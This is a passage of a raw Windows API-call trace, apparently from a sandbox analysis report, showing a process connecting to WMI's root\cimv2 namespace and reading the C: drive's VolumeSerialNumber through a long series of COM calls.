WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e9e0 | out: ppvObject=0x6c0e9e0*=0x0) returned 0x80004002 [0196.378] WbemDefPath:IUnknown:Release (This=0x6030b00) returned 0x2 [0196.378] WbemDefPath:IUnknown:Release (This=0x6030b00) returned 0x1 [0196.378] CoGetContextToken (in: pToken=0x6c0f2d8 | out: pToken=0x6c0f2d8) returned 0x0 [0196.378] CoGetContextToken (in: pToken=0x6c0f238 | out: pToken=0x6c0f238) returned 0x0 [0196.378] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x6c0f308*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6c0f304 | out: ppvObject=0x6c0f304*=0x6030b00) returned 0x0 [0196.378] WbemDefPath:IUnknown:AddRef (This=0x6030b00) returned 0x3 [0196.378] WbemDefPath:IUnknown:Release (This=0x6030b00) returned 0x2 [0196.378] WbemDefPath:IWbemPath:SetText (This=0x6030b00, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0196.378] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b00, puCount=0x6c0f48c | out: puCount=0x6c0f48c*=0x0) returned 0x0 [0196.378] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=2, puBuffLength=0x6c0f488*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f488*=0x20, pszText=0x0) returned 0x0 [0196.378] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=2, puBuffLength=0x6c0f488*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f488*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0196.378] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030b00, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0196.378] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b00, puCount=0x6c0f48c | out: puCount=0x6c0f48c*=0x0) returned 0x0 [0196.378] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030b00, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0196.378] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030b00, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0196.378] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b00, puCount=0x6c0f40c | out: puCount=0x6c0f40c*=0x0) returned 0x0 [0196.378] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x6c0f3f8 | out: puCount=0x6c0f3f8*=0x2) returned 0x0 [0196.378] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6c0f3f4*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3f4*=0xf, pszText=0x0) returned 0x0 [0196.378] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6c0f3f4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3f4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0196.378] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f3a8 | out: ppv=0x6c0f3a8*=0xb51e34) returned 0x0 [0196.378] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f3a0 | out: pAptType=0x6c0f3a0*=1) returned 0x0 [0196.378] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f3a4 | out: ppvObject=0x6c0f3a4*=0x0) returned 0x80004002 [0196.378] IUnknown:Release (This=0xb51e34) returned 0x1 [0196.379] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0ed10 | out: ppv=0x6c0ed10*=0x6027590) returned 0x0 [0196.379] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027590, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0ef28 | out: ppvObject=0x6c0ef28*=0x0) returned 0x80004002 [0196.379] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027590, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ef3c | out: ppvObject=0x6c0ef3c*=0x60305c0) returned 0x0 [0196.379] WbemDefPath:IUnknown:Release (This=0x6027590) returned 0x0 [0196.379] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eb5c | out: ppvObject=0x6c0eb5c*=0x60305c0) returned 0x0 [0196.380] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0eb18 | out: ppvObject=0x6c0eb18*=0x0) returned 0x80004002 [0196.380] WbemDefPath:IUnknown:AddRef (This=0x60305c0) returned 0x3 [0196.380] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e474 | out: ppvObject=0x6c0e474*=0x0) returned 0x80004002 [0196.380] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e424 | out: ppvObject=0x6c0e424*=0x0) returned 0x80004002 [0196.380] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e430 | out: ppvObject=0x6c0e430*=0xbe2360) returned 0x0 [0196.380] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe2360, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e438 | out: pCid=0x6c0e438*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0196.380] WbemDefPath:IUnknown:Release (This=0xbe2360) returned 0x3 [0196.380] CoGetContextToken (in: pToken=0x6c0e490 | out: pToken=0x6c0e490) returned 0x0 [0196.380] CoGetContextToken (in: pToken=0x6c0e898 | out: pToken=0x6c0e898) returned 0x0 [0196.380] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e928 | out: ppvObject=0x6c0e928*=0x0) returned 0x80004002 [0196.380] WbemDefPath:IUnknown:Release (This=0x60305c0) returned 0x2 [0196.380] WbemDefPath:IUnknown:Release (This=0x60305c0) returned 0x1 [0196.380] CoGetContextToken (in: pToken=0x6c0f220 | out: pToken=0x6c0f220) returned 0x0 [0196.380] CoGetContextToken (in: pToken=0x6c0f180 | out: pToken=0x6c0f180) returned 0x0 [0196.380] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x6c0f250*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6c0f24c | out: ppvObject=0x6c0f24c*=0x60305c0) returned 0x0 [0196.380] WbemDefPath:IUnknown:AddRef (This=0x60305c0) returned 0x3 [0196.380] WbemDefPath:IUnknown:Release (This=0x60305c0) returned 0x2 [0196.380] WbemDefPath:IWbemPath:SetText (This=0x60305c0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0196.380] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60305c0, puCount=0x6c0f3d0 | out: puCount=0x6c0f3d0*=0x2) returned 0x0 [0196.380] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=4, puBuffLength=0x6c0f3cc*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3cc*=0xf, pszText=0x0) returned 0x0 [0196.380] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=4, puBuffLength=0x6c0f3cc*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3cc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0196.380] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f3d0 | out: ppv=0x6c0f3d0*=0xb51e34) returned 0x0 [0196.380] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f3c8 | out: pAptType=0x6c0f3c8*=1) returned 0x0 [0196.380] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f3cc | out: ppvObject=0x6c0f3cc*=0x0) returned 0x80004002 [0196.381] IUnknown:Release (This=0xb51e34) returned 0x1 [0196.381] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0eff0 | out: ppv=0x6c0eff0*=0x6023d20) returned 0x0 [0196.381] WbemLocator:IUnknown:QueryInterface (in: This=0x6023d20, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0f208 | out: ppvObject=0x6c0f208*=0x0) returned 0x80004002 [0196.381] WbemLocator:IClassFactory:CreateInstance (in: This=0x6023d20, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f21c | out: ppvObject=0x6c0f21c*=0x6027650) returned 0x0 [0196.381] WbemLocator:IUnknown:Release (This=0x6023d20) returned 0x0 [0196.381] WbemLocator:IUnknown:QueryInterface (in: This=0x6027650, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ee3c | out: ppvObject=0x6c0ee3c*=0x6027650) returned 0x0 [0196.381] WbemLocator:IUnknown:QueryInterface (in: This=0x6027650, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0edf8 | out: ppvObject=0x6c0edf8*=0x0) returned 0x80004002 [0196.381] WbemLocator:IUnknown:AddRef (This=0x6027650) returned 0x3 [0196.381] WbemLocator:IUnknown:QueryInterface (in: This=0x6027650, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e754 | out: ppvObject=0x6c0e754*=0x0) returned 0x80004002 [0196.381] WbemLocator:IUnknown:QueryInterface (in: This=0x6027650, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e704 | out: ppvObject=0x6c0e704*=0x0) returned 0x80004002 [0196.382] WbemLocator:IUnknown:QueryInterface (in: This=0x6027650, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e710 | out: ppvObject=0x6c0e710*=0x0) returned 0x80004002 [0196.382] CoGetContextToken (in: pToken=0x6c0e770 | out: pToken=0x6c0e770) returned 0x0 [0196.382] CoGetContextToken (in: pToken=0x6c0eb78 | out: pToken=0x6c0eb78) returned 0x0 [0196.382] WbemLocator:IUnknown:QueryInterface (in: This=0x6027650, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ec08 | out: ppvObject=0x6c0ec08*=0x0) returned 0x80004002 [0196.382] WbemLocator:IUnknown:Release (This=0x6027650) returned 0x2 [0196.382] WbemLocator:IUnknown:Release (This=0x6027650) returned 0x1 [0196.382] CoGetContextToken (in: pToken=0x6c0f1e8 | out: pToken=0x6c0f1e8) returned 0x0 [0196.382] CoGetContextToken (in: pToken=0x6c0f148 | out: pToken=0x6c0f148) returned 0x0 [0196.382] WbemLocator:IUnknown:QueryInterface (in: This=0x6027650, riid=0x6c0f218*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6c0f214 | out: ppvObject=0x6c0f214*=0x6027650) returned 0x0 [0196.382] WbemLocator:IUnknown:AddRef (This=0x6027650) returned 0x3 [0196.382] WbemLocator:IUnknown:Release (This=0x6027650) returned 0x2 [0196.382] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60305c0, puCount=0x6c0f3ac | out: puCount=0x6c0f3ac*=0x2) returned 0x0 [0196.382] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=8, puBuffLength=0x6c0f3a8*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3a8*=0xf, pszText=0x0) returned 0x0 [0196.382] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=8, puBuffLength=0x6c0f3a8*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3a8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0196.382] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6c0f284 | out: ppv=0x6c0f284*=0x60278c0) returned 0x0 [0196.382] WbemLocator:IWbemLocator:ConnectServer (in: This=0x60278c0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6c0f318 | out: ppNamespace=0x6c0f318*=0x6033584) returned 0x0 [0196.904] WbemLocator:IUnknown:QueryInterface (in: This=0x6033584, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1b4 | out: ppvObject=0x6c0f1b4*=0xb5b134) returned 0x0 [0196.905] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5b134, pProxy=0x6033584, pAuthnSvc=0x6c0f204, pAuthzSvc=0x6c0f200, pServerPrincName=0x6c0f1f8, pAuthnLevel=0x6c0f1fc, pImpLevel=0x6c0f1ec, pAuthInfo=0x6c0f1f0, pCapabilites=0x6c0f1f4 | out: pAuthnSvc=0x6c0f204*=0xa, pAuthzSvc=0x6c0f200*=0x0, pServerPrincName=0x6c0f1f8, pAuthnLevel=0x6c0f1fc*=0x6, pImpLevel=0x6c0f1ec*=0x2, pAuthInfo=0x6c0f1f0, pCapabilites=0x6c0f1f4*=0x1) returned 0x0 [0196.905] WbemLocator:IUnknown:Release (This=0xb5b134) returned 0x1 [0196.905] WbemLocator:IUnknown:QueryInterface (in: This=0x6033584, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1a8 | out: ppvObject=0x6c0f1a8*=0xb5b154) returned 0x0 [0196.905] WbemLocator:IUnknown:QueryInterface (in: This=0x6033584, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1a4 | out: ppvObject=0x6c0f1a4*=0xb5b134) returned 0x0 [0196.905] WbemLocator:IClientSecurity:SetBlanket (This=0xb5b134, pProxy=0x6033584, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0196.905] WbemLocator:IUnknown:Release (This=0xb5b134) returned 0x2 [0196.905] WbemLocator:IUnknown:Release (This=0xb5b154) returned 0x1 [0196.905] CoTaskMemFree (pv=0xbd4a38) [0196.905] WbemLocator:IUnknown:Release (This=0x60278c0) returned 0x0 [0196.905] WbemLocator:IUnknown:QueryInterface (in: This=0x6033584, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eda4 | out: ppvObject=0x6c0eda4*=0xb5b154) returned 0x0 [0196.905] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b154, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0ed60 | out: ppvObject=0x6c0ed60*=0x0) returned 0x80004002 [0196.906] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b154, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0eb7c | out: ppvObject=0x6c0eb7c*=0x0) returned 0x80004002 [0196.906] WbemLocator:IUnknown:AddRef (This=0xb5b154) returned 0x3 [0196.906] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b154, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e6bc | out: ppvObject=0x6c0e6bc*=0x0) returned 0x80004002 [0196.906] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b154, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e66c | out: ppvObject=0x6c0e66c*=0x0) returned 0x80004002 [0196.907] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b154, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e678 | out: ppvObject=0x6c0e678*=0xb5b0b4) returned 0x0 [0196.907] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5b0b4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e680 | out: pCid=0x6c0e680*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0196.907] WbemLocator:IUnknown:Release (This=0xb5b0b4) returned 0x3 [0196.907] CoGetContextToken (in: pToken=0x6c0e6d8 | out: pToken=0x6c0e6d8) returned 0x0 [0196.907] CoGetContextToken (in: pToken=0x6c0eae0 | out: pToken=0x6c0eae0) returned 0x0 [0196.907] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b154, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eb70 | out: ppvObject=0x6c0eb70*=0xb5b13c) returned 0x0 [0196.907] WbemLocator:IRpcOptions:Query (in: This=0xb5b13c, pPrx=0xb5b154, dwProperty=2, pdwValue=0x6c0eb98 | out: pdwValue=0x6c0eb98) returned 0x80004002 [0196.907] WbemLocator:IUnknown:Release (This=0xb5b13c) returned 0x3 [0196.907] WbemLocator:IUnknown:Release (This=0xb5b154) returned 0x2 [0196.907] CoGetContextToken (in: pToken=0x6c0f0b8 | out: pToken=0x6c0f0b8) returned 0x0 [0196.907] CoGetContextToken (in: pToken=0x6c0f018 | out: pToken=0x6c0f018) returned 0x0 [0196.907] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b154, riid=0x6c0f0e8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6c0f0e4 | out: ppvObject=0x6c0f0e4*=0x6033584) returned 0x0 [0196.907] WbemLocator:IUnknown:AddRef (This=0x6033584) returned 0x4 [0196.907] WbemLocator:IUnknown:Release (This=0x6033584) returned 0x3 [0196.907] WbemLocator:IUnknown:Release (This=0x6033584) returned 0x2 [0196.907] SysStringLen (param_1=0x0) returned 0x0 [0196.907] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b00, puCount=0x6c0f47c | out: puCount=0x6c0f47c*=0x0) returned 0x0 [0196.907] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=2, puBuffLength=0x6c0f478*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f478*=0x20, pszText=0x0) returned 0x0 [0196.907] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=2, puBuffLength=0x6c0f478*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f478*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0196.907] CoGetContextToken (in: pToken=0x6c0f0e8 | out: pToken=0x6c0f0e8) returned 0x0 [0196.907] WbemLocator:IUnknown:AddRef (This=0xb5b154) returned 0x3 [0196.907] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b154, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ef7c | out: ppvObject=0x6c0ef7c*=0xb5b154) returned 0x0 [0196.908] WbemLocator:IUnknown:Release (This=0xb5b154) returned 0x3 [0196.908] WbemLocator:IUnknown:Release (This=0xb5b154) returned 0x2 [0196.908] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=2, puBuffLength=0x6c0f480*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f480*=0x20, pszText=0x0) returned 0x0 [0196.908] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=2, puBuffLength=0x6c0f480*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f480*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0196.908] IWbemServices:GetObject (in: This=0x6033584, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6c0f434*=0x0, ppCallResult=0x0 | out: ppObject=0x6c0f434*=0x6028b10, ppCallResult=0x0) returned 0x0 [0197.141] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60305c0, puCount=0x6c0f434 | out: puCount=0x6c0f434*=0x2) returned 0x0 [0197.141] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=4, puBuffLength=0x6c0f430*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f430*=0xf, pszText=0x0) returned 0x0 [0197.141] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=4, puBuffLength=0x6c0f430*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f430*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0197.141] IWbemClassObject:Get (in: This=0x6028b10, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6c0f430*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x35f3ba4*=0, plFlavor=0x35f3ba8*=0 | out: pVal=0x6c0f430*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x35f3ba4*=8, plFlavor=0x35f3ba8*=0) returned 0x0 [0197.141] SysStringByteLen (bstr="9C354B42") returned 0x10 [0197.141] SysStringByteLen (bstr="9C354B42") returned 0x10 [0197.141] IWbemClassObject:Get (in: This=0x6028b10, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6c0f438*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x35f3ba4*=8, 